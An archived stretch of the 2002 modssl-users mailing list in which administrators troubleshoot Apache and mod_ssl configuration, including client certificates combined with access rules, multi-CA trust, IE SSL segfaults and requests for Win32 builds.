Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Reality TV - the ultimate oxymoron


> -----Original Message-----
> From: Harald Koch [mailto:chk@pobox.com]
> Sent: 22 September 2002 23:53
> To: modssl-users@modssl.org
> Subject: certificate + network ACL + passwords problem?
> 
> 
> I've tried this both with the stock (fully patched) RedHat 
> 7.2, and with
> a fresh-built Apache 1.3.26 + modssl-2.8.10-1.3.26 + openssl-0.9.6g.
> 
> With the attached config snippet for a "private" directory, 
> based on the
> samples from the documentation, the webserver first asks me for my
> certificate, successfully validates it, and *then* asks me for a
> username/password. I know the certificate is successfully 
> authenticated,
> as I've modified my CustomLog entry to log the values of
> SSL_CLIENT_S_DN, SSL_CLIENT_VERIFY, and SSL_CIPHER_USEKEYSIZE.
> 
> If I comment out the four lines for network-based access control:
> 
>     #Order                   deny,allow
>     #Deny                    from all
>     #Allow                   from 127.0.0.1
>     #Allow                   from 199.85.99.0/24
> 
> Then I get my expected behaviour, which is:
> - if I give a certificate, I get access
> - if I don't give a certificate, I am asked for username/password
> 
> Am I being dense about combining access control methods, or is there a
> bug somewhere?
> 
> Thanks in advance,
> 
> -- 
> Harald Koch     
> 
> "It takes a child to raze a village."
> 		-Michael T. Fry
> 
> 
> 
>     #       any "intranet' access is allowed
>     #       but from the Internet only HTTPS + Strong-Cipher 
> + Password
>     #       or the alternative HTTPS + Strong-Cipher + 
> Client-Certificate
> 
>     #       If HTTPS is used, make sure a strong cipher is used.
>     # Additionally, allow client certs as an alternative to 
> basic auth.
>     SSLRequireSSL
>     SSLVerifyClient         optional
>     SSLVerifyDepth          2
>     SSLOptions              -StrictRequire +OptRenegotiate +StdEnvVars
>     SSLRequire ( %{SSL_CIPHER_USEKEYSIZE} >= 128 and 
> %{SSL_CLIENT_VERIFY} eq "SUCCESS" )
> 
>     #   Allow any of certs, network access or basic auth
>     Satisfy                 any
> 
>     #   Network Access Control
>     Order                   deny,allow
>     Deny                    from all
>     Allow                   from 127.0.0.1
>     Allow                   from 199.85.99.0/24
> 
>     #   HTTP Basic Authentication
>     AuthType                Basic
>     AuthName                "CFRQ users"
>     AuthUserFile            /etc/httpd/conf/passwd
>     Require                 valid-user
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 23 16:17:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA18754; Mon, 23 Sep 2002 16:16:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from persephone.cfrq.net id QAA18748; Mon, 23 Sep 2002 16:15:36 +0200 (MET DST)
Received: from elisabeth.cfrq.net (elisabeth.chk.cfrq.net [199.85.99.82] (may be forged))
	by persephone.cfrq.net (8.12.2/8.12.2) with ESMTP id g8NEFN9c017250
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK)
	for ; Mon, 23 Sep 2002 10:15:24 -0400
Received: from elisabeth.cfrq.net (localhost [127.0.0.1])
	by elisabeth.cfrq.net (8.12.2/8.12.2) with ESMTP id g8NEFJFm003153
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO)
	for ; Mon, 23 Sep 2002 10:15:21 -0400
Received: from elisabeth.cfrq.net (chk@localhost)
	by elisabeth.cfrq.net (8.12.2/8.12.2/Submit) with ESMTP id g8NEFGcQ003119
	for ; Mon, 23 Sep 2002 10:15:18 -0400
X-Authentication-Warning: elisabeth.cfrq.net: chk owned process doing -bs
To: modssl-users@modssl.org
Subject: Re: certificate + network ACL + passwords problem? 
References: <9B66BBD37D5DD411B8CE00508B69700F033F20EA@pborolocal.rnib.org.uk>
In-reply-to: Your message of "Mon, 23 Sep 2002 13:58:59 +0100".
	 <9B66BBD37D5DD411B8CE00508B69700F033F20EA@pborolocal.rnib.org.uk> 
From: Harald Koch 
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <3108.1032790514.1@elisabeth.cfrq.net>
Date: Mon, 23 Sep 2002 10:15:15 -0400
Message-ID: <3116.1032790515@elisabeth.cfrq.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Harald Koch 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> I think it's just the way you use allow, deny. I would have put this myself:
> 
>      Order                   deny,allow
>      Deny                    from all
>      Allow                   from 127.0.0.1, 199.85.99.

Same behaviour, alas.

-- 
Harald Koch     

"It takes a child to raze a village."
		-Michael T. Fry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 23 16:48:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA19937; Mon, 23 Sep 2002 16:47:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from email.seznam.cz id QAA19922; Mon, 23 Sep 2002 16:46:05 +0200 (MET DST)
Received: (qmail 3748 invoked by uid 0); 23 Sep 2002 14:46:01 -0000
Received: from [217.195.161.94] by email.seznam.cz with HTTP;
	Mon, 23 Sep 2002 16:46:01 +0200 (CEST)
Content-Type: text/plain; charset=ISO-8859-2
Date: Mon, 23 Sep 2002 16:46:01 +0200 (CEST)
From: =?iso-8859-2?Q?Pavel=20Zdenek?= 
Subject: =?iso-8859-2?Q?Client=20certs=20of=20multiple=20CA=27s=20=3F?=
Mime-Version: 1.0
Message-Id: <18648.45383-27312-1199440130-1032792361@seznam.cz>
To: modssl-users@modssl.org
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA19934
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-2?Q?Pavel=20Zdenek?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

i am playing around with client certs. It works just fine, except the
issue that i would like to allow client certs signed by multiple
different CA's. I've got the certs of those trusted CA's in the
folder targeted by SSLCACertificatePath folder and completed with
hash.N symlinks as requested. So far, the access is successful only
if i address ONLY ONE CA cert with SSLCACertificateFile (and browser
offers me only that client cert of the same CA). It works for any of
the CA's in CertificatePath, but only one at a time. If i use the
CertificatePath instead of File, something inside apparently works,
as the browser offers me a selection of ALL applicable client certs,
which is basically the desired behavior. But i get that nasty error
in SSL log file "no client certificate returned" afterwards, the same
as if the CA of client cert is not trusted.

Is that a browser issue (some IE 5.5 i think) ? Am i using
CertificatePath right? Yes i know i can concat all CA certs in one
file and use the CertificateFile directive, but what is the hash
symlinks indexing for then?

Thanks,

Marvin.

______________________________________________________________________
Reklama:
Prekvapive dobry signal! Presvedcte se v Oskar Testu ...
http://www.oskarmobil.cz/oskartest
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 23 23:17:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA29146; Mon, 23 Sep 2002 23:16:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from SOTTMXS01.entrust.com id XAA29135; Mon, 23 Sep 2002 23:15:15 +0200 (MET DST)
Received: by SOTTMXS01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Mon, 23 Sep 2002 17:15:03 -0400
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: RE: certificate + network ACL + passwords problem?
Date: Mon, 23 Sep 2002 17:15:02 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C26346.47ED26A0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C26346.47ED26A0
Content-Type: text/plain


Hi,

Does anyone know what the "Challenge Passphrase" is used for when creating a
CSR ?

I know it can be used for a Verisign renewal or reissue etc...

Is there anything else?

Thanks,
Rob

------_=_NextPart_001_01C26346.47ED26A0
Content-Type: text/html






RE: certificate + network ACL + passwords problem?






Hi,




Does anyone know what the "Challenge Passphrase" is used for when creating a CSR ?




I know it can be used for a Verisign renewal or reissue etc...




Is there anything else?




Thanks,

Rob





------_=_NextPart_001_01C26346.47ED26A0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 24 10:01:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA11383; Tue, 24 Sep 2002 10:00:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from message.teja.com id JAA11258; Tue, 24 Sep 2002 09:59:56 +0200 (MET DST)
Received: (from nobody@localhost)
	by message.teja.com (8.11.6/8.11.6) id g8O7xtO05277
	for modssl-users@modssl.org; Tue, 24 Sep 2002 00:59:55 -0700
X-Authentication-Warning: message.teja.com: nobody set sender to shawn@teja.com using -f
Received: from 66.229.20.28 ( [66.229.20.28])
	as user shawn@message.teja.com by message.teja.com with HTTP;
	Tue, 24 Sep 2002 00:59:55 -0700
Message-ID: <1032854395.3d901b7b563a6@message.teja.com>
Date: Tue, 24 Sep 2002 00:59:55 -0700
From: "Shawn M. Green" 
To: modssl-users@modssl.org
Subject: IE6 & SSL problems
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shawn M. Green" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

OK, I know the IE/SSL issue has been discussed in the past.  I've read as many
posts and FAQs on the issue as I can.  All of the fixes that I've found are
implemented in my configuration (in fact, was done so automatically at server
build time). 

All of my users run IE 5.5, 5.5sp2, 6, or 6sp1 as they are all Windows 2000. 
When attempting to access the secure area on my webserver, they recieve a 'page
cannot be displayed' error.  Upon refresh, 70% of the page will properly appear.
 Another refresh and the rest may appear OR the error will come up again. 
Another refresh and the same thing OR it will come up fine.  It's a vicious
cycle, I tell ya!

I have been able to confirm the error on both Win98 & Win2k using IE6 and 6sp1.

I do get this error in the log files from time to time:

[Wed Sep 11 10:27:48 2002] [error] mod_ssl: SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)

But, more often (in fact, on any IE access), I see this in my logs:

[Tue Sep 24 00:30:00 2002] [notice] child pid 3713 exit signal Segmentation
fault (11)
[Tue Sep 24 00:30:03 2002] [notice] child pid 4234 exit signal Segmentation
fault (11)
[Tue Sep 24 00:30:08 2002] [notice] child pid 3711 exit signal Segmentation
fault (11)

Upon a SIGHUP of apache, IE will work beautifully for, maybe, 3 minutes, then
the errors start all over again.  Sigh.

Of course, no problem with Netscape or Mozilla on Windows or UNIX.

Server config is as follows:

Red Hat 6.2, Apache 1.3.26, PHP 4.12, mod_ssl 2.8.10, OpenSSL 0.9.5a. 
Certificate is self-signed test cert.

Snips from http.conf:

SSLSessionCache         dbm:/usr/local/apache/logs/ssl_scache
SSLSessionCacheTimeout  300

SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

Any other pointers would be GREATLY appreciated. :)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 24 15:27:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA19114; Tue, 24 Sep 2002 15:26:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id PAA19029; Tue, 24 Sep 2002 15:25:33 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 24 Sep 2002 06:24:27 -0700
Received: from 204.115.33.45 by lw7fd.law7.hotmail.msn.com with HTTP;
	Tue, 24 Sep 2002 13:24:26 GMT
X-Originating-IP: [204.115.33.45]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
Date: Tue, 24 Sep 2002 13:24:26 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 24 Sep 2002 13:24:27.0206 (UTC) FILETIME=[B4C52660:01C263CD]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi,

I wish to have this file that hunter has contributed 
(Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip) to be available to 
everyone without any problems.

If someone could tell us how to post such contribution files to the
http://www.modssl.org/contrib/ftp/contrib/ area, i believe it would help a 
lot of modssl users.

Thanks and Regards,

Bye,
-Jim.

>From: hunter Reply-To: modssl-users@modssl.org
>To: modssl-users@modssl.org
>Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>Date: Wed, 18 Sep 2002 05:51:56 -0400
>

>Jim and/or Paul,
>
>I don't know how to contribute... I will find out, but it is late and I 
>want to go to bed.  Maybe someone can put these into 
>http://www.modssl.org/contrib/ftp/contrib/ for me.  And, someone could 
>shorten the path to the knowledge of how to submit the code for 
>contribution -- I tried ftp'ing and could not write (no suprise).
>
>I have binaries (untested) for the releases you are after.
>(I am running Apache 2.0.40 but can easily build the code for these 
>versions - configuring and testing it is more work and I leave that up to 
>you).
>
>If you have any problem with the code I will spend some more time on it 
>later in the evening - send me a note (theantigod@sympatico.ca or 
>hunter@tor.ath.cx).
>
>http://tor.ath.cx/~hunter/apache/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip
>
>I built the openssl with masm as well by the way.
>
>chris
>
>P.S.
>I cannot handle a lot of traffic and suffer from (relatively) slow transfer 
>rate. (ADSL Modem with Sympatico)
>
>
>
>
>______________________________________________________________________


>Jim Lee wrote:
>>Hi,
>>
>>Since i am a windows user, i am looking for an already compiled file:
>>Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>
>>Since i do not have any compilers installed, i would really appreciate if 
>>any of our UNIX friends could help our WINDOWS collegues and post the 
>>Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip file in the 
>>following location: http://www.modssl.org/contrib/ftp/contrib/
>>
>>Thanks,
>>
>>Bye,
>>-Jim.
>>
>>>From: Horst To: Jim Lee 
>>>Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>>Date: Tue, 17 Sep 2002 20:42:08 -0700 (PDT)
>>>
>>>Hi Jim,
>>>I didn't read all the previous messages and the reference to
>>>http://www.modssl.org/contrib/ftp/contrib/
>>>  but I'd guess you can google for the 3 independent files.
>>>That's how I found Apache_1.3.26 and Mod_SSL_2.8.10 recently.
>>>
>>>  - Horst (ohh, just realizing you are on Win - I am on linux and got the
>>>RPMs with no problem)
>>>
>>>
>>>On Wed, 18 Sep 2002, Jim Lee wrote:
>>>
>>> > I have been unable to find the file:
>>> >
>>> > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>> >
>>> > at the following location:
>>> >
>>> > http://www.modssl.org/contrib/ftp/contrib/
>>> >
>>> > Any help from our fellow members in the group would be higly 
>>>appreciated in
>>> > view of the recent openSSL worm virus alerts.
>>> >
>>> > Thanks and Regards,
>>> >
>>> > Bye,
>>> > -Jim.
>>> >
>>> >
>>> > >From: Paul
>>
>>To: jimlee2@hotmail.com
>>
>>> > >Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>> > >Date: Wed, 18 Sep 2002 09:02:41 +1200
>>> > >
>>> > > > Hi,
>>> > > >
>>> > > > I am looking for the following file:
>>> > > >
>>> > > >
>>> > > > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>> > > >
>>> > > >
>>> > > > in the     http://www.modssl.org/contrib/ftp/contrib/       
>>>folder.
>>> > > >
>>> > > >
>>> > > > If anyone could contribute this file, i would highly appreciate 
>>>it.
>>> > > >
>>> > >
>>> > >Hi Jim,
>>> > >
>>> > >I'm looking for that file too!  Did you have any luck.
>>> > >
>>> > >Cheers, Paul.
>>> > >--
>>> >
>>> >
>>> >
>>> >
>>> > _________________________________________________________________
>>
>>
>>
>>
>>
>>





_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 24 20:35:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA26190; Tue, 24 Sep 2002 20:34:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from persephone.cfrq.net id UAA26186; Tue, 24 Sep 2002 20:33:55 +0200 (MET DST)
Received: from elisabeth.cfrq.net (elisabeth.chk.cfrq.net [199.85.99.82] (may be forged))
	by persephone.cfrq.net (8.12.2/8.12.2) with ESMTP id g8OIXlmR007983
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK)
	for ; Tue, 24 Sep 2002 14:33:48 -0400
Received: from elisabeth.cfrq.net (localhost [127.0.0.1])
	by elisabeth.cfrq.net (8.12.2/8.12.2) with ESMTP id g8OIXjFm014930
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO)
	for ; Tue, 24 Sep 2002 14:33:46 -0400
Received: from elisabeth.cfrq.net (chk@localhost)
	by elisabeth.cfrq.net (8.12.2/8.12.2/Submit) with ESMTP id g8OIXfIw014927
	for ; Tue, 24 Sep 2002 14:33:44 -0400
X-Authentication-Warning: elisabeth.cfrq.net: chk owned process doing -bs
To: modssl-users@modssl.org
Subject: Re: IE6 & SSL problems 
References: <1032854395.3d901b7b563a6@message.teja.com>
In-reply-to: Your message of "Tue, 24 Sep 2002 00:59:55 -0700".
	 <1032854395.3d901b7b563a6@message.teja.com> 
From: Harald Koch 
Date: Tue, 24 Sep 2002 14:33:40 -0400
Message-ID: <14926.1032892420@elisabeth.cfrq.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Harald Koch 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> All of my users run IE 5.5, 5.5sp2, 6, or 6sp1 as they are all Windows 2000. 
> When attempting to access the secure area on my webserver, they recieve a 'page
> cannot be displayed' error.  Upon refresh, 70% of the page will properly appear.
>  Another refresh and the rest may appear OR the error will come up again. 
> Another refresh and the same thing OR it will come up fine.

Cool. I've never seen this one, and I use IE (various versions) to
access apache (various versions, various OSes) zillions of pages on my
servers everyday.

> [Tue Sep 24 00:30:00 2002] [notice] child pid 3713 exit signal Segmentation
> fault (11)
> [Tue Sep 24 00:30:03 2002] [notice] child pid 4234 exit signal Segmentation
> fault (11)
> [Tue Sep 24 00:30:08 2002] [notice] child pid 3711 exit signal Segmentation
> fault (11)

This is a bad sign... have you got any unusual modules loaded? I know of
one vendor that has an Apache module that conflicts with libssl if they
are loaded the right way.

> Server config is as follows:
> 
> Red Hat 6.2, Apache 1.3.26, PHP 4.12, mod_ssl 2.8.10, OpenSSL 0.9.5a. 

0.9.5a is ancient... It looks like you're building apache and mod_ssl
from source; I'd build openssl (0.9.6g) from source too and use that
instead of the RH6.2 distributed openssl libraries.

-- 
Harald Koch     

"It takes a child to raze a village."
		-Michael T. Fry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 24 21:11:28 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA26717; Tue, 24 Sep 2002 21:10:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id VAA26706; Tue, 24 Sep 2002 21:09:51 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KMW3OKLYI800PL58@mdx.ac.uk> for modssl-users@modssl.org; Tue,
 24 Sep 2002 20:09:59 +0100 (BST)
Received: from mdx-bg-staff1.nw.mdx.ac.uk
 (mdx-bg-staff1.mdx.ac.uk [158.94.39.4]) by mdx.ac.uk (PMDF V6.1-1 #38636)
 with ESMTP id <01KMW3MHAE1K00NV0F@mdx.ac.uk> for modssl-users@modssl.org; Tue,
 24 Sep 2002 20:09:50 +0100 (BST)
Received: from MDX-BG-STAFF1/SpoolDir by mdx-bg-staff1.nw.mdx.ac.uk
 (Mercury 1.48); Tue, 24 Sep 2002 20:06:49 +0000
Received: from SpoolDir by MDX-BG-STAFF1 (Mercury 1.48); Tue,
 24 Sep 2002 20:02:30 +0000
Date: Tue, 24 Sep 2002 19:45:10 +0000
From: a.moon@mdx.ac.uk
Subject: Re: IE6 & SSL problems
To: modssl-users@modssl.org
Message-id: <8A1AF68207D@mdx-bg-staff1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Due to unaviodable circumstances, I am away from the office until the Monday 30th September 2002 

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Kirsteen1, Sanjay1 or Jeff1
who should be able to help.

If the problem relates to mubsweb please contact sanjay1
If the probelm relates to OASIS or WebCT please contact Kirsteen1
If your query  relates to mbs1111 or it support please contact Jeff1

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 24 22:24:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA28474; Tue, 24 Sep 2002 22:23:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from message.teja.com id WAA28467; Tue, 24 Sep 2002 22:22:54 +0200 (MET DST)
Received: (from nobody@localhost)
	by message.teja.com (8.11.6/8.11.6) id g8OKMqj01259
	for modssl-users@modssl.org; Tue, 24 Sep 2002 13:22:52 -0700
X-Authentication-Warning: message.teja.com: nobody set sender to shawn@teja.com using -f
Received: from 209.10.202.116 ( [209.10.202.116])
	as user shawn@message.teja.com by message.teja.com with HTTP;
	Tue, 24 Sep 2002 13:22:52 -0700
Message-ID: <1032898972.3d90c99c80334@message.teja.com>
Date: Tue, 24 Sep 2002 13:22:52 -0700
From: "Shawn M. Green" 
To: modssl-users@modssl.org
Subject: Re: IE6 & SSL problems 
References: <1032854395.3d901b7b563a6@message.teja.com> <14926.1032892420@elisabeth.cfrq.net>
In-Reply-To: <14926.1032892420@elisabeth.cfrq.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: Internet Messaging Program (IMP) 3.1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shawn M. Green" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Quoting Harald Koch :

> > All of my users run IE 5.5, 5.5sp2, 6, or 6sp1 as they are all Windows
> 2000. 
> > When attempting to access the secure area on my webserver, they recieve a
> 'page
> > cannot be displayed' error.  Upon refresh, 70% of the page will properly
> appear.
> >  Another refresh and the rest may appear OR the error will come up again.
> 
> > Another refresh and the same thing OR it will come up fine.
> 
> Cool. I've never seen this one, and I use IE (various versions) to
> access apache (various versions, various OSes) zillions of pages on my
> servers everyday.

Yeah, kinda nifty, eh?  ;)

> 
> > [Tue Sep 24 00:30:00 2002] [notice] child pid 3713 exit signal
> Segmentation
> > fault (11)
> > [Tue Sep 24 00:30:03 2002] [notice] child pid 4234 exit signal
> Segmentation
> > fault (11)
> > [Tue Sep 24 00:30:08 2002] [notice] child pid 3711 exit signal
> Segmentation
> > fault (11)
> 
> This is a bad sign... have you got any unusual modules loaded? I know of
> one vendor that has an Apache module that conflicts with libssl if they
> are loaded the right way.

No unusual modules loaded.  httpd -l output is:
Compiled-in modules:
  http_core.c
  mod_env.c
  mod_log_config.c
  mod_mime.c
  mod_negotiation.c
  mod_status.c
  mod_include.c
  mod_autoindex.c
  mod_dir.c
  mod_cgi.c
  mod_asis.c
  mod_imap.c
  mod_actions.c
  mod_userdir.c
  mod_alias.c
  mod_rewrite.c
  mod_access.c
  mod_auth.c
  mod_so.c
  mod_setenvif.c
  mod_ssl.c
suexec: disabled; invalid wrapper /usr/local/apache/bin/suexec

> 
> > Server config is as follows:
> > 
> > Red Hat 6.2, Apache 1.3.26, PHP 4.12, mod_ssl 2.8.10, OpenSSL 0.9.5a. 
> 
> 0.9.5a is ancient... It looks like you're building apache and mod_ssl
> from source; I'd build openssl (0.9.6g) from source too and use that
> instead of the RH6.2 distributed openssl libraries.

Yeah, and with finally catching up on my bugtraq last night, I've read more into
the OpenSSL funnies that have been happening lately.  Will update the OpenSSL
and rebuild everything tonight.  Thanks for the tips

Shawn

> 
> -- 
> Harald Koch     
> 
> "It takes a child to raze a village."
> 		-Michael T. Fry
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 25 07:05:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA08699; Wed, 25 Sep 2002 07:04:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts16-srv.bellnexxia.net id HAA08688; Wed, 25 Sep 2002 07:03:45 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts16-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020925050344.QFWR15333.tomts16-srv.bellnexxia.net@sympatico.ca>
          for ; Wed, 25 Sep 2002 01:03:44 -0400
Message-ID: <3D9143B3.4030002@sympatico.ca>
Date: Wed, 25 Sep 2002 01:03:47 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Jim Lee wrote:
> 
> Hi,
> 
> I wish to have this file that hunter has contributed 
> (Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip) to be available 
> to everyone without any problems.
> 
Jim and friends,

I have also tried to contact someone at OpenSSL, with no reply.

